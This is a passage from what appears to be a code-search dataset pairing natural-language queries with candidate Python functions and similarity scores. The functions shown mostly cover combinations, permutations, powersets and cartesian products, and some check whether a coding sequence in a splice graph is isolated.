permutations(xs):\n yield [x] + ys", "def get_paren_combos():\n results = [None] * 4\n options = [('%s', '(%s)')]\n for i in range(1, 4):\n results[i] = list(itertools.product(*(i * options)))\n return results", "def powerset(iterable):\n s = list(iterable)\n return itertools.chain.from_iterable( itertools.combinations(s, r)\n for r in range(len(s)+1) )", "def iter_combos(include_unknown=False):\n if include_unknown:\n return _combos\n else:\n return _combos[:-7]", "def CombinationMethods(nums, elements_number):\n res = list(c(nums, elements_number))\n return res, Combination(len(nums), elements_number)", "def myCombinations(iterable, r):\n for perm in itertools.permutations(iterable, r):\n if sorted(perm) == list(perm):\n yield perm", "def swp_combo_iter(self) -> Iterable[Tuple[Any, ...]]:\n return itertools.product(*(self._sweep_params[var] for var in self._swp_var_list))", "def sets(elements, set_size):\n return combinations(elements, set_size)", "def combinations(sequence, length, NULL=object()):\r\n if length <= 0:\r\n combos = [NULL]\r\n else:\r\n combos = []\r\n for i, item in enumerate(sequence, 1):\r\n rem_items = sequence[i:]\r\n rem_combos = combinations(rem_items, length-1)\r\n combos.extend(item if combo is NULL else [item, combo]\r\n for combo in rem_combos)\r\n return combos", "def cands(inputs):\n # The below could probably be simplified a bit....\n return map(''.join, list(itertools.chain.from_iterable([ map (list, (itertools.permutations(inputs, x))) for x in range(4, len(inputs)+1)])))", "def cartesian_product(input_sets, elem_size=1):\n import itertools\n out = []\n # ::-1 reverse order to be backwards compatiable with old\n # function below\n for r in itertools.product(*input_sets[::-1]):\n out.append(r)\n out = np.asarray(out).T[::-1, :]\n return out\n\n # try:\n # from pyapprox.cython.utilities import cartesian_product_pyx\n # # # fused type does not work for np.in32, np.float32, np.int64\n # # # so envoke cython cast\n # # if np.issubdtype(input_sets[0][0],np.signedinteger):\n # # return cartesian_product_pyx(input_sets,1,elem_size)\n # # if np.issubdtype(input_sets[0][0],np.floating):\n # # return cartesian_product_pyx(input_sets,1.,elem_size)\n # # else:\n # # return cartesian_product_pyx(\n # # input_sets,input_sets[0][0],elem_size)\n # # always convert to float then cast back\n # cast_input_sets = [np.asarray(s, dtype=float) for s in input_sets]\n # out = cartesian_product_pyx(cast_input_sets, 1., elem_size)\n # out = np.asarray(out, dtype=input_sets[0].dtype)\n # return out\n # except:\n # print('cartesian_product extension failed')\n\n # num_elems = 1\n # num_sets = len(input_sets)\n # sizes = np.empty((num_sets), dtype=int)\n # for ii in range(num_sets):\n # sizes[ii] = input_sets[ii].shape[0]/elem_size\n # num_elems *= sizes[ii]\n # # try:\n # # from pyapprox.weave import c_cartesian_product\n # # # note c_cartesian_product takes_num_elems as last arg and cython\n # # # takes elem_size\n # # return c_cartesian_product(input_sets, elem_size, sizes, num_elems)\n # # except:\n # # print ('cartesian_product extension failed')\n\n # result = np.empty(\n # (num_sets*elem_size, num_elems), dtype=type(input_sets[0][0]))\n # for ii in range(num_elems):\n # multi_index = ind2sub(sizes, ii, num_elems)\n # for jj in range(num_sets):\n # for kk in range(elem_size):\n # result[jj*elem_size+kk, ii] =\\\n # input_sets[jj][multi_index[jj]*elem_size+kk]\n # return result", "def cartesian(arrays, dtype=np.float32):\n la = len(arrays)\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[...,i] = a\n return arr.reshape(-1, la)", "def tc_gen(n):\r\n comb = (list(tuple) for tuple in itertools.product([True,False], repeat=n))\r\n return list(comb)", "def _product(self, args):\n pools = map(tuple, args) #within original version args defined as *args\n result = [[]]\n for pool in pools:\n result = [x + [y] for x in result for y in pool]\n return result", "def powerset(xs):\n cards = list(reversed(xrange(len(xs)))) + [len(xs)]\n return list(chain.from_iterable(combinations(xs, n) for n in cards))", "def combinations_from_options(self):\n combs = []\n Nmetals = self.options.metal_sbu_per_structure\n for combo in self.options.sbu_combinations:\n # first sbus have to be metals.\n met = []\n for i in range(Nmetals):\n met.append(self.sbus.get(combo[i], _METAL=True))\n combs.append(tuple(met + [self.sbus.get(i) for i in combo[Nmetals:]]))\n return combs", "def powerset(iterable):\n\n s = list(iterable)\n\n return chain.from_iterable(combinations(s, r) for r in range(2, len(s) + 1))", "def __combination(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __combination(orgset[i + 1 :], k - 1):\n yield (x,) + s", "def pair_combos(iterable):\n pairs = set()\n for a in iterable:\n for b in iterable:\n pairs.add(a + b)\n return list(pairs)", "def cartesian(arrays, out=None):\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n dtype = arrays[0].dtype\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n if out is None:\n out = np.empty_like(ix, dtype=dtype)\n\n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:, n]]\n\n return out", "def cartesian(arrays, out=None):\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n dtype = arrays[0].dtype\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n if out is None:\n out = np.empty_like(ix, dtype=dtype)\n\n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:, n]]\n\n return out", "def get_combinations(text):\n combinations = []\n arr = []\n slen = len(text)\n __find_factor(slen,slen,combinations,arr)\n \n elements = []\n for comb in combinations:\n tmp = [0] + comb\n elements.append([text[tmp[i]:tmp[i]+tmp[i+1]] for i in range(len(tmp)-1)])\n return elements", "def get_all_combinations(self):\n stuffs = map(lambda row: row.split(\" \"), self.expanded['GS'] )\n\n combs = self.all_combinations(stuffs)\n\n cls_repeated = self.expanded['CLS'].reset_index(drop=True)[np.array(combs[0])]\n\n A = cls_repeated.reset_index(drop=True)\n B = pd.Series(combs[1])\n\n combo_table = pd.DataFrame([A, B]).T\n\n combo_table.columns = ['CLS','GSCMB']\n\n df = combo_table\n\n df['srt'] = [ ' '.join(map(str, g)) for g in df[\"GSCMB\"] ]\n keep_idx = df[[0,2]].drop_duplicates().index\n gewd = df.iloc[keep_idx,:].reset_index(drop=True)[[\"CLS\",\"GSCMB\"]]\n\n combo_table = gewd\n\n combo_dict = combo_table.groupby('CLS')['GSCMB'].apply(lambda x: x.tolist())\n return combo_dict", "def generate_true_combinations(data):\n true_combinations = []\n for group in data:\n for i in range(len(group)):\n for j in range(i, len(group)):\n true_combinations.append((group[i], group[j], 1))\n return true_combinations", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1))", "def cartesianproduct(lists):\r\n return reduce(appendEs2Sequences,lists,[])", "def _get_argument_combinations(arguments):\n arg_names = sorted(arguments)\n combinations = itertools.product(*(arguments[arg] for arg in arg_names))\n combinations = [dict(zip(arg_names, arg_values)) for arg_values in combinations]\n return combinations", "def powerset(iterable):\n\n \"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)\"\n s = list(iterable)\n return itertools.chain.from_iterable(\n itertools.combinations(s, r) for r in range(1, len(s) + 1)\n )", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(2, len(s)+1))", "def get_pairs(terms):\n return itertools.combinations(terms, 2)", "def generateCombos(vars,constants):\n # SUPER NOT GENERALIZED---TOO LATE AT NIGHT FOR ME TO DO RECURSIVE ALGORITHMS\n assert len(vars) == 2 and len(constants) == 2\n combs = []\n for c1 in constants:\n for c2 in constants:\n combs.append(Grounding([(vars[0], c1), (vars[1], c2)]))\n return combs", "def allcombinations(orgset, k):\n return itertools.chain(*[combination(orgset, i) for i in range(1, k + 1)])", "def _powerset(iterable: Iterable) -> Iterator:\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))", "def tripletGenerator(S):\n for a in S:\n for b in S:\n for c in S:\n yield (a, b, c)", "def all_subsets(self, ss):\n return chain(*map(lambda x: combinations(ss, x), range(1, len(ss)+1)))", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def __iter__(self):\n return iproduct(*self.sets)", "def expand_grid(param_dict):\n return list(itertools.product(*param_dict.values()))", "def part_1():\n return itertools.permutations(range(5))", "def generate_new_combinations(old_combinations):\r\n\r\n items_types_in_previous_step = np.unique(old_combinations.flatten())\r\n for old_combination in old_combinations:\r\n max_combination = max(old_combination)\r\n for item in items_types_in_previous_step:\r\n if item > max_combination:\r\n res = tuple(old_combination) + (item,)\r\n yield res", "def _cartesian(arrays):\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n out = pd.DataFrame()\n\n for n, arr in enumerate(arrays):\n out[n] = arrays[n][ix[:, n]]\n\n return out", "def item_combinations(items, combo_range):\n if combo_range.start < 0 or combo_range.stop < 0:\n raise ValueError(\"Range must not be negative\")\n elif (\n combo_range.start == combo_range.stop\n or combo_range.start == 0\n and combo_range.stop == 1\n ):\n # Choices are of length zero\n return []\n\n full_length_combos = []\n if combo_range.start == 0:\n no_choice = [None for _ in range(combo_range.stop - 1)]\n full_length_combos.append(tuple(no_choice))\n combo_range = range(1, combo_range.stop)\n\n expected_length = combo_range.stop - 1\n for length in combo_range:\n combos = itertools.combinations(items, length)\n if length < expected_length:\n combos = [c + tuple([None] * (expected_length - length)) for c in combos]\n full_length_combos.extend(combos)\n\n return full_length_combos", "def combination_util(arr, n, r, index, data, i):\n if index == r:\n for j in range(r):\n print(data[j], end=\" \")\n print(\" \")\n return\n # When no more elements are there to put in data[]\n if i >= n:\n return\n # current is included, put next at next location\n data[index] = arr[i]\n combination_util(arr, n, r, index + 1, data, i + 1)\n # current is excluded, replace it with\n # next (Note that i+1 is passed, but\n # index is not changed)\n combination_util(arr, n, r, index, data, i + 1)\n # The main function that prints all combinations\n # of size r in arr[] of size n. This function\n # mainly uses combinationUtil()", "def get_all_combinations(param_opt):\n\tif not param_opt:\n\t\treturn {}\n\treturn (dict(zip(param_opt.keys(), x)) for x in itertools.product(*param_opt.values()))", "def corner_combinations(zdim: int):\n return combinations(range(zdim), 2)", "def powerset(iterable):\n\tset_list = list(iterable)\n\treturn list(chain.from_iterable(combinations(set_list, r)\n\t\t\t\t\t\t\t\tfor r in range(len(set_list)+1)))", "def gen_input_permutation():\n return [(arch, src, dst) for arch in architecture.ARCH_ACCEPTED for src in PRODUCT_TYPE for dst in PRODUCT_TYPE]", "def comb(set, n):\n if len(set) < n:\n raise Exception(\"Not enough elements\")\n elif len(set) == n:\n yield set\n else:\n setLen = len(set)\n iters = [rangeIter(setLen - n + 1)]\n values = [0] * n\n values[0] = iters[0].next()\n level = 1\n while True:\n # Fill array of iterators back up\n while level < n:\n iters.append(rangeIter(values[level - 1] + 1,\n setLen - n + level + 1))\n values[level]=iters[level].next()\n level += 1\n subset = [set[i] for i in values]\n yield subset\n while True:\n try:\n values[level - 1] = iters[level - 1].next()\n break\n except StopIteration:\n iters.pop()\n level -= 1\n if level == 0:\n # Top-level iterator is done, so we are too\n raise StopIteration", "def part_2():\n return itertools.permutations(range(5, 10))", "def combinations(iterable, r):\n pool = tuple(iterable)\n n = len(pool)\n if r > n:\n return\n indices = list(range(r))\n yield tuple(pool[i] for i in indices)\n while True:\n for i in reversed(range(r)):\n if indices[i] != i + n - r:\n break\n else:\n return\n indices[i] += 1\n for j in range(i+1, r):\n indices[j] = indices[j-1] + 1\n yield tuple(pool[i] for i in indices)", "def combine(combination_input):\n\n output = sum([map(list, itertools.combinations(combination_input, i)) for i in range(len(combination_input) + 1)], [])\n output_final = [sorted(i) for i in output if len(i)>1]\n\n return sorted(output_final)", "def permutations(iterable):\n pass", "def AllPermutations(data):\n if len(data) <= 1:\n return data\n\n return [p for p in itertools.permutations(data)]", "def pathCombinations(A,compnts):\n linkOpt = []\n pSize = len(compnts)\n #Variable to keep track of number of nodes in the branch\n nNodes = 1\n\n #Find the links between each adjacent component in the path\n for i in range(pSize-1):\n rows,cols = np.where(A[compnts[i+1],:][:,compnts[i]]==1)\n if i == 0:\n cols += compnts[0]\n rows += nNodes\n elif i == pSize-2:\n rows += compnts[-1]\n cols += nNodes - len(compnts[i])\n else:\n rows += nNodes\n cols += nNodes - len(compnts[i])\n edges = zip(rows,cols)\n nNodes += len(compnts[i+1])\n linkOpt.append(edges)\n\n allPaths = [list(P) for P in itertools.product(*linkOpt)]\n return allPaths", "def get_param_combinations(cls):\n for key, val in cls.param.items():\n if not isinstance(val, (list, Quantity)):\n cls.param[key] = [val]\n elif isinstance(val, Quantity) and val.size == 1:\n try:\n # check if val.value is iterable, e.g. a list or a NumPy array\n iter(val.value)\n except:\n cls.param[key] = [val.value] * val.unit\n combos = tuple(dict(zip(cls.param, combo)) for combo in it.product(*cls.param.values()))\n return tuple(c for c in filter(cls._param_validator, combos))", "def cartesian_product_of_generators(*generators):\n tuple_size = len(generators)\n if (tuple_size == 1):\n for elem in generators[0].generate():\n yield (elem, )\n\n else:\n for sub_tuple in cartesian_product_of_generators(*generators[1:]):\n for elem in generators[0].generate():\n yield (elem, ) + sub_tuple", "def enumerate_combinations(n):\n combos = []\n for i in range(2, n): # 1 to n - 1\n _combos = list(combinations(range(n), i))\n combos += _combos\n\n combos_np = np.zeros((len(combos), n))\n for i in range(len(combos)):\n for idx in combos[i]:\n combos_np[i][idx] = 1\n\n combos_np = combos_np.astype(np.bool)\n return combos_np", "def powerset(s):\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def test_combinations(self):\r\n self.assertFloatEqual(combinations(5, 3), 10)\r\n self.assertFloatEqual(combinations(5, 2), 10)\r\n # only one way to pick no items or the same number of items\r\n self.assertFloatEqual(combinations(123456789, 0), 1)\r\n self.assertFloatEqual(combinations(123456789, 123456789), 1)\r\n # n ways to pick one item\r\n self.assertFloatEqual(combinations(123456789, 1), 123456789)\r\n # n(n-1)/2 ways to pick 2 items\r\n self.assertFloatEqual(\r\n combinations(\r\n 123456789,\r\n 2),\r\n 123456789 *\r\n 123456788 /\r\n 2)\r\n # check an arbitrary value in R\r\n self.assertFloatEqual(combinations(1234567, 12), 2.617073e64)", "def Demo():\n print(Combination(8, 4))\n print(CombinationMethods([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3))", "def powerset(iterable):\n xs = list(iterable)\n # note we return an iterator rather than a list\n return chain.from_iterable(combinations(xs,n) for n in range(len(xs)+1))", "def power_set(A):\n\n L = list()\n for i in range(len(A) + 1):\n L.extend([set(j) for j in itertools.combinations(A, i)])\n return L\n\n raise NotImplementedError(\"Problem 4 Incomplete\")", "def combinations(s, n):\n return (\"\".join(x) for x in tuples(s,n))", "def Allcombos():\n\n global allcombos\n\n allcombos = []\n\n results = product(\"ABCDEF\", repeat=4)\n\n allcombos = resulttolist(results)\n\n return AIguessing(allcombos)", "def get_array_combi(data_array, grid_size, combi_array):\n result = [0] * grid_size # initialise to 0's\n\n offset = 0\n for (index,size) in enumerate(data_array):\n \n head = offset + combi_array[index]\n result[head:head+size] = [1] * size\n \n offset += size\n\n return result", "def generate_valid_combos(self, prepped_equation, var_ranges, input_array):\n\n valid_combos = []\n\n # Generate the set of valid answer values as a FiniteSet. The\n # FiniteSet is necessary because sympy returns a FiniteSet when\n # it solves equations.\n solution_set = FiniteSet(*var_ranges[str(self.x)])\n\n # For every variable combination, substitute the values for each\n # input variable into the final_equation so sympy can solve for the\n # remaining variable.\n\n for var_values in input_array:\n final_equation = prepped_equation\n for i, var in enumerate(self.variables):\n if i < len(self.variables)-1:\n final_equation = final_equation.subs(var['variable'], var_values[i])\n\n # Solve for self.x.\n answer = solveset(final_equation, self.x)\n\n #### Currently, this is just rigged to capture when we have a single integer solution\n if self.dict['positive_only'] == True:\n answer = answer.intersection(ConditionSet(x, x > 0))\n\n # Add valid combinations to valid_combos list, with each valid combo as a dict\n if answer.issubset(solution_set) and answer != set():\n valid_combo = {}\n valid_combo['values'] = {}\n\n # Add variable values to dict\n for i, var in enumerate(self.variables):\n if i < len(self.variables)-1:\n valid_combo['values'][var['variable']] = int(var_values[i]) ### Forces int, which needs to be updated\n\n # Add answer value(s) to dict\n valid_combo['values'][self.x] = [int(i) for i in answer]\n\n valid_combos.append(valid_combo)\n\n return valid_combos", "def get_all_sample_combinations(samples1, samples2):\n import itertools\n samples = []\n for r in itertools.product(*[samples1.T, samples2.T]):\n samples.append(np.concatenate(r))\n return np.asarray(samples).T", "def get_array_index_permutations(param):\n indices = list()\n\n try:\n for d in reversed(param.get(\"dimensions\")):\n i = list()\n for x in range(0, d.get(\"len\")):\n i.append(x)\n indices.append(i)\n\n array_dereferences = list(itertools.product(*indices))\n return array_dereferences\n\n except TypeError:\n return list()", "def get_all_possible_pairs(self, a, b):\n return itertools.product(a, b)" ]
[ "0.73074627", "0.7185561", "0.6950121", "0.67702305", "0.67702305", "0.6750947", "0.6720031", "0.6644649", "0.6399782", "0.63772047", "0.63587743", "0.6318727", "0.62932175", "0.62885773", "0.62456626", "0.6200499", "0.6191303", "0.61892384", "0.61841613", "0.6181527", "0.61622316", "0.61622316", "0.61181575", "0.610233", "0.6060569", "0.60541725", "0.60429776", "0.6036647", "0.60253865", "0.6004554", "0.60024446", "0.5965597", "0.5957819", "0.59541786", "0.59391576", "0.5932418", "0.5844158", "0.5840223", "0.58291405", "0.58290356", "0.58185714", "0.5816813", "0.58052003", "0.57998043", "0.57953125", "0.57922184", "0.57786405", "0.5777211", "0.5777211", "0.57770747", "0.5776237", "0.57675785", "0.5763649", "0.5763649", "0.5763649", "0.57516813", "0.57498026", "0.5747779", "0.5740277", "0.5738083", "0.5737139", "0.5729438", "0.57233065", "0.57230717", "0.57103944", "0.57045895", "0.5703747", "0.57025903", "0.56954473", "0.5680879", "0.567955", "0.5675204", "0.5652386", "0.56432235", "0.5632993", "0.56236166", "0.56190276", "0.561761", "0.5613637", "0.55945927", "0.55894506", "0.55738693", "0.5570378", "0.5552225", "0.5538758", "0.55281544", "0.55239916", "0.55142504", "0.55107343", "0.54971045", "0.5484362", "0.5475122", "0.54725426", "0.5463139", "0.5460688", "0.54562837", "0.54401827", "0.54358786", "0.54218346", "0.5416459" ]
0.79023576
0
Indicate if a peptide is translated by an isolated cds Currently, it is a simple version. If the exon where the cds is has no connected exon, it is isolated. (the method is not true in some cases)
def is_isolated_cds(gene, gene_info, idx): if len(gene_info.vertex_succ_list[idx]) > 0: return False return np.sum(gene.splicegraph.edges[:, idx]) == 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_isolated(self, d):\n if not self.center.is_isolated(d):\n return False\n\n for i in self.leads:\n if not i.is_isolated(d+1):\n return False\n\n return True", "def is_atomic(self):\n found = True\n if self.ant is not None:\n for p in self.ant:\n if p.conn != 'at':\n found = False\n if self.con is not None:\n for prop in self.con:\n if prop.conn != 'at':\n found= False\n return found", "def is_dip(self):\n if (\n self.dip\n and not self.deleted\n and not self.replica\n and not self.aip\n and not self.sip\n ):\n return True\n return False", "def is_isolated(self, d = None):\n if d is None:\n return len(self.__m__) == 0 or (len(self.__m__) == 1 and (0,)*self.dims in self.__m__)\n\n else:\n for k in self.__m__.keys():\n if not k[d] == 0:\n return False\n\n return True", "def is_allc(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'd':\n return False\n return True", "def is_on(self):\n return self._state != self._invert_logic", "def is_aip(self):\n if (\n self.aip\n and not self.deleted\n and not self.replica\n and not self.dip\n and not self.sip\n ):\n return True\n return False", "def is_conjugate(self):\n return self.is_dagger and bool(self.z)", "def is_alld(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'c':\n return False\n return True", "def is_cis(self):\n prev_res = self.get_offset_residue(-1)\n if prev_res is None:\n return None\n\n prev_omega = prev_res.calc_torsion_omega()\n if prev_omega is None:\n return None\n\n if abs(prev_omega) <= (math.pi/2.0):\n return True\n\n return False", "def test_is_canonical_by_transcript(self):\n assert self.icd.is_canonical_by_transcript(\"ENST00000373656\") is True\n assert self.icd.is_canonical_by_transcript(\"ENST00000373654\") is False\n assert self.icd.is_canonical_by_transcript(\"ENST00000337451\") is True\n assert self.icd.is_canonical_by_transcript(\"ENST00000398013\") is False", "def independent(self) -> bool:\n parent = self._parent()\n if parent is None:\n return True\n connections = parent._graph.connections\n path = self._path\n lp = len(path)\n for con in connections:\n if con[\"type\"] == \"connection\":\n if con[\"target\"][:lp] == path:\n return False\n return True", "def is_nucleic_acid(self):\n return False", "def non_plein(self):\n # pass\n # mon travail\n # si on trouve un espace dans le plateau , il n'est pas plein ==> true\n b = False\n for i in range(0, 3):\n for j in range(0, 3):\n if self.cases[(i, j)].contenu == \" \":\n b = True\n return b", "def is_nucleic_acid(self):\n return True", "def has_isolated_vertices(self):\n return self.properties.isolated_vertices", "def is_independent(self, word):\n return not self.is_dependent(word)", "def independent_components(self) -> bool:\n return bool(self.GetIndependentComponents())", "def use_direct_diago(self):\n return self.algo == \"direct_diago\"", "def current_involvement(doing, eid):\n if eid in doing: return True\n for dn in active_target_of(doing, eid):\n return True\n return False", "def in_isolation(self):\n return self.state in [AddressStates.ISOLATING, AddressStates.ISOLATED]", "def is_indicator():\n return True", "def is_atomic(self):\n \n symbols=set()\n for e in self.symbols:\n if not e=='':\n symbols.add(e)\n\n for s in symbols: #unicity first\n count=0\n for e in symbols:\n if s==e:\n count+=1\n if count!=1:\n return False\n else:\n continue \n temp=symbols.copy()\n for s in symbols:\n temp.remove(s)\n for e in temp:\n if s in e:\n return False\n else:\n continue\n temp=symbols.copy()\n\n return True", "def is_concealed(self) -> bool:\n # return not self._exposed\n return sum(self.concealed_part.values()) == 13", "def _is_solvent_accessible(protein_coords, atm, min_distance=2):\n if str(atm.atomic_symbol) == 'H':\n atm_position = np.array(atm.coordinates)\n neighbour = np.array(atm.neighbours[0].coordinates)\n direction = np.subtract(atm_position, neighbour) * 2\n position = np.array([direction + atm_position])\n distance = min(np.linalg.norm(protein_coords - position, axis=1))\n if distance > min_distance:\n return True\n else:\n return False\n\n else:\n return True", "def has_passage(self, c, d):\n\n return (self.cells[c] & (1 << d)) > 0", "def is_incomplete_cds(transcript_id):\n start_phase = get_cds_start_phase(transcript_id)\n if start_phase:\n return start_phase > 0\n else:\n return False", "def _ison(self):\n return self.dp.state()==PyTango.DevState.ON", "def independent(self):\n return True", "def has_undercoordinated_c(self) -> bool:\n if self._undercoordinated_carbon is not None:\n return self._undercoordinated_carbon\n\n self._has_undercoordinated_carbon()\n return self._undercoordinated_carbon", "def isTransitID(self, id:str) -> bool:\n\t\tif Utils.isSPRelative(id):\n\t\t\tids = id.split('/')\n\t\t\treturn len(ids) > 0 and ids[0] != CSE.cseCsi[1:]\n\t\telif Utils.isAbsolute(id):\n\t\t\tids = id.split('/')\n\t\t\treturn len(ids) > 2 and ids[2] != CSE.cseCsi[1:]\n\t\treturn False", "def isConnected(*args, ignoreUnitConversion: bool=True, **kwargs)->bool:\n pass", "def is_non_inverting(self):\n\n return False", "def ocp_is_tripped(self):\n self._raise_not_implemented()", "def is_connective(char):\n return char in [u\"¬\", u\"∧\", u\"∨\", u\"→\", u\"↔\"]", "def is_cn(self, y, t):\n return t == 0 and y == 0", "def is_on(self):\n return self._wrap_device.device.get_duct_zone(self._zone)", "def isIdeographic(ch):\n ret = libxml2mod.xmlIsIdeographic(ch)\n return ret", "def is_amino_acid(self):\n return True", "def _is_one_sided_assumption(self, assumption: TrackingAssumption) -> bool:\n if self._fuse_row:\n return all(\n y != self._row_idx for gp in assumption.gps for _, y in gp.pos\n ) or all(y != self._row_idx + 1 for gp in assumption.gps for _, y in gp.pos)\n return all(\n x != self._col_idx for gp in assumption.gps for x, _ in gp.pos\n ) or all(x != self._col_idx + 1 for gp in assumption.gps for x, _ in gp.pos)", "def is_atom_convex(self):\n return False", "def is_atom_convex(self):\n return False", "def is_amino_acid(self):\n return False", "def is_equivalence(self) -> bool:", "def is_independent(self, A):\n if self.variant.is_bipartite():\n raise ValueError()\n return not any(self.is_edge(v, w) for (v, w) in combinations(A, 2))", "def check_connected(chosen_atom, identified_bonds):\n check = False\n for bond in identified_bonds:\n if ((\"E1AE1A\" in str(get_bond_id(chosen_atom, bond[0])[0])) or (\"C1AC1A\" in str(get_bond_id(chosen_atom, bond[0])[0])) or (\"H1AH1A\" in str(get_bond_id(chosen_atom, bond[0])[0])) or (\"P1AP1A\" in str(get_bond_id(chosen_atom, bond[0])[0]))):\n check = True\n return check", "def isccp4i_info(self):\n return False", "def is_atom_concave(self):\n return False", "def is_atom_concave(self):\n return False", "def is_atom_concave(self):\n return False", "def _is_consonant(self, word, i):\n if word[i] in self.vowels:\n return False\n if word[i] == \"y\":\n if i == 0:\n return True\n else:\n return not self._is_consonant(word, i - 1)\n return True", "def _compositions_swapped(self, thermo):\n assert self._ref_indicators is not None\n\n indicators = self._singlet_comparison(thermo)\n\n for list1, list2 in zip(indicators, self._ref_indicators):\n comp_swapped = True\n for ind1, ind2 in zip(list1, list2):\n if ind1 == ind2:\n comp_swapped = False\n if comp_swapped:\n return True\n return False", "def is_atom_convex(self) -> bool:\n return False", "def is_atom_convex(self):\n return True", "def has_nucleic_acids(self):\n for frag in self.iter_nucleic_acids():\n return True\n return False", "def is_connected_drm():\n drm_status = xbee.atcmd(AT_CMD_DI)\n if drm_status is None or drm_status not in drm_status_connected:\n return False\n return True", "def is_simply_laced(self):\n return self._info['simply_laced']", "def is_on(self):\n return self._cur != -1", "def isclockwise(self):\n s = sum((seg[1][0] - seg[0][0]) * (seg[1][1] + seg[0][1])\n for seg in self.segment_tuples)\n return s > 0", "def have_cdc() -> bool:", "def is_on(self) -> bool:\n return self.event.is_tripped", "def connected(self):\n answer = True\n if self._value is None and self.partner is None:\n answer = False\n if answer is False and len(self._subSlots) > 0:\n answer = True\n for s in self._subSlots:\n if s.connected() is False:\n answer = False\n break\n return answer", "def is_t2t(self):\n g = self.get_gene().get_seq()\n if 'c' != g[1]:\n return False\n if not len(g) >= 8:\n return False\n for x in range(2, 4):\n if g[x] is not 'c':\n return False\n for x in range(1, len(g)-3):\n dec = 'd' if x % 4 == 0 else 'c'\n if g[x+3] is not dec:\n return False\n return True", "def obtem_ciclo_in(self):\n\n return self.ciclo_in", "def is_violated(self,\n env\n ):\n flag = any([con.is_violated(env) for con in self.constraints])\n return flag", "def is_correction_active(self):\n\n return self.is_winter_correction_active() or self.is_summer_correction_active()", "def is_atom_concave(self) -> bool:\n return False", "def is_solved(self):\n marker = self._marker\n\n count = 0\n for row in marker:\n for piece in row:\n if piece == \"*\":\n count += 1\n if count == 1:\n return True\n else:\n return False", "def inscricao(self):\n\n return True", "def continued_involvement(doing, eid, clock, step=0.01):\n if eid in doing:\n if doing[eid].end_clock > (clock+step): return True\n for dn in active_target_of(doing, eid):\n if dn.end_clock > (clock+step): return True\n return False", "def is_simple(self):\n if not self.is_compact(): return False\n\n for v in self.vertex_generator():\n adj = [a for a in v.neighbors()]\n if len(adj) != self.dim():\n return False\n\n return True", "def is_on(self) -> bool:\n val = bool(self._cluster_handler.cluster.get(self._zcl_attribute))\n return (not val) if self.inverted else val", "def _departure_on_duty(self) -> bool:\n return self._get_departure_shift().is_on_duty()", "def identical_cds(sc1,sc2):\n # Input 2 identical segment chains, return True if cds the same\n if sc1.covers(sc2) and sc2.covers(sc1):\n return True\n else:\n return False", "def done(self, streetlearn):\n return not bool(self._coin_pano_id_set)", "def is_geocoded(self):\n return self.position != None", "def is_dicotic(G):\n return G.n == 0", "def is_symmetric(self):\n _is_sym = self._is_sym\n if _is_sym is not None:\n return _is_sym\n\n n = self.degree\n if n >= 8:\n if self.is_transitive():\n _is_alt_sym = self._eval_is_alt_sym_monte_carlo()\n if _is_alt_sym:\n if any(g.is_odd for g in self.generators):\n self._is_sym, self._is_alt = True, False\n return True\n\n self._is_sym, self._is_alt = False, True\n return False\n\n return self._eval_is_alt_sym_naive(only_sym=True)\n\n self._is_sym, self._is_alt = False, False\n return False\n\n return self._eval_is_alt_sym_naive(only_sym=True)", "def connected(self):\n return self.izx.connected and self.ezx.connected", "def is_dna(sequentie):\r\n for nucleotide in sequentie:\r\n if nucleotide not in \"ACGTN\":\r\n return False\r\n return True", "def _isconnected(self) -> bool:\n for pin in self.pins:\n if pin._isconnected():\n return True\n\n return False", "def is_interesting(x):\n if any(x.startswith(y) for y in (\"0000\", \"0004\", \"0400\", \"0404\")):\n return False\n # The TM can't leave a state once it gets to it.\n # Either it doesn't use that state, or it loops\n # Neither is TM we are interested in\n if \"0\" == x[0] == x[2] == x[4] or \"1\" == x[6] == x[8] == x[10]:\n return False\n return True", "def is_constructing_scv(self) -> bool:\n return self.orders and self.orders[0].ability.id in {\n AbilityId.TERRANBUILD_ARMORY,\n AbilityId.TERRANBUILD_BARRACKS,\n AbilityId.TERRANBUILD_BUNKER,\n AbilityId.TERRANBUILD_COMMANDCENTER,\n AbilityId.TERRANBUILD_ENGINEERINGBAY,\n AbilityId.TERRANBUILD_FACTORY,\n AbilityId.TERRANBUILD_FUSIONCORE,\n 